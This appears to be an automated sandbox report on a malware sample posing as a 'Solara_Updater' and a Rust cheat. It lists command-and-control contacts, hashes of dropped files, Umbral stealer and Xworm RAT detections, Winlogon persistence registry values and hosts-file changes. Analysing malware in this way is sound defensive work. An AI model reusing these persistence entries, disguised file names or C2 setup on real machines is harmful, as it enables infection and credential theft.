US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp

Files

memory/2204-0-0x000007FEF5DC3000-0x000007FEF5DC4000-memory.dmp

memory/2204-1-0x0000000000370000-0x0000000000556000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/1332-12-0x0000000000EC0000-0x0000000000EEA000-memory.dmp

memory/2204-13-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/1332-22-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/2020-39-0x0000000001190000-0x00000000011A6000-memory.dmp

memory/2816-42-0x0000000000BA0000-0x0000000000BE0000-memory.dmp

memory/1332-43-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/1728-48-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/1728-49-0x0000000001F50000-0x0000000001F58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGTQ1QPBF6XYJOYSUCSN.temp

MD5 b6b8bab093d4ff199935f22e50747dc0
SHA1 19def7e3ef7a0ea0abfe3def8e2ba3c157759b54
SHA256 45340bc56619f2e2d5cdecbd58edf4476f0ba1222de962171d3f5e3c2ee380e5
SHA512 270a56f366df93e9a70c91b9551cc5f5beca46607e7a7f03a933cf3173c93a6c5b9f778c1fda49663edb4a3af76e6c86f90520793614be9598c5f36edfc3f24f

memory/2380-55-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2380-56-0x0000000001E80000-0x0000000001E88000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/720-84-0x0000000002860000-0x0000000002868000-memory.dmp

memory/720-83-0x000000001B650000-0x000000001B932000-memory.dmp

memory/268-95-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/268-96-0x0000000002330000-0x0000000002338000-memory.dmp

memory/2328-108-0x000000001B650000-0x000000001B932000-memory.dmp

memory/2328-109-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2828-126-0x0000000000320000-0x0000000000360000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

memory/2704-175-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2704-177-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2040-197-0x0000000001350000-0x0000000001390000-memory.dmp

memory/2204-199-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp

memory/2440-226-0x00000000012C0000-0x00000000012D6000-memory.dmp

memory/2300-239-0x0000000000280000-0x000000000045E000-memory.dmp

memory/2300-241-0x00000000005E0000-0x00000000005EE000-memory.dmp

memory/2300-243-0x0000000000610000-0x000000000062C000-memory.dmp

memory/2300-245-0x0000000000640000-0x0000000000658000-memory.dmp

memory/2300-247-0x00000000005F0000-0x00000000005F8000-memory.dmp

memory/2300-249-0x0000000000600000-0x000000000060C000-memory.dmp

C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/1668-293-0x00000000003D0000-0x00000000005AE000-memory.dmp

memory/2080-298-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/1548-307-0x00000000027A0000-0x00000000027A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e7lG3Dof0tiB7u3

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\0oxgHCygznUf7EF

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

memory/2396-377-0x0000000000310000-0x0000000000350000-memory.dmp

memory/2276-415-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2276-414-0x000000001B760000-0x000000001BA42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mq0WKMOC4v9hs1b\Display\Display.png

MD5 ecf765e18eded64fe607e5c21deade47
SHA1 2ec02f6dece315077da9e97174e04293ee07b85c
SHA256 53df102706734d46e13097748fa21e808b3bf422bc6407c39446629617d8e0c3
SHA512 5db8b57c2021dcc555aaca5ca919426ff060166335c58e8bd5f6f763c0da89fcb04d02414df909b793bdcacd0bd863c8af9dacb48c0f31fe502a3209a71bf298

memory/2720-431-0x0000000000F50000-0x0000000000F90000-memory.dmp

memory/2972-495-0x0000000000280000-0x0000000000288000-memory.dmp

memory/2704-496-0x0000000000970000-0x0000000000B4E000-memory.dmp

memory/1080-516-0x00000000001E0000-0x0000000000220000-memory.dmp

memory/2152-609-0x0000000000D40000-0x0000000000D48000-memory.dmp

memory/1764-610-0x0000000000080000-0x000000000025E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
